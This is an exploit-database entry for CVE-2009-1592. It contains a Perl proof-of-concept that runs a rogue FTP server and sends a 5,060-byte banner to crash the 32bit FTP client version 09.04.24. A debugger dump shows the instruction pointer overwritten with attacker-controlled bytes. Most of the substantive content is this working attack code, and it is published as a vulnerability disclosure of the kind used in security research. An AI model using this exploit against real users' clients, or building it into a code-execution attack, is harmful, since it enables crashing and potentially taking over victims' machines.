32bit FTP (09.04.24) Banner Remote Buffer Overflow PoC

2009-05-11 / 2009-05-12
Credit: electrasoft
Risk: High
Local: No
Remote: Yes
CVE: CVE-2009-1592
CWE: CWE-119


CVSS Base Score: 10/10
Impact Subscore: 10/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

#! /usr/bin/perl # # A client side vulnerability in the product allows remote servers to cause the client to crash by sending it a large banner. # By: Load 99% # # website: http://www.electrasoft.com/32ftp.htm # Version:09.04.24 # #0:005> g # ... #(9b0.bac): Access violation - code c0000005 (first chance) #First chance exceptions are reported before any exception handling. #This exception may be expected and handled. #eax=41414141 ebx=00000001 ecx=000013e7 edx=0382ec14 esi=fffffffe edi=00000000 #eip=41414141 esp=0382f018 ebp=0382f050 iopl=0 nv up ei pl nz na pe nc #cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206 #41414141 ?? ??? # use IO::Socket::INET; my $socket = IO::Socket::INET->new('LocalPort' => 21, 'Proto' => 'tcp', 'Listen' => SOMAXCONN) or die "Can't create socket ($!)\n"; print "Server listening\n"; $data = "220 ".("\x41" x 5060)."\r\n"; while (my $client = $socket->accept) { print "send> data.\n"; print $client $data; } die "Can't accept socket ($!)\n";

References:

http://www.securityfocus.com/bid/34822
http://www.milw0rm.com/exploits/8614
http://www.milw0rm.com/exploits/8611


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top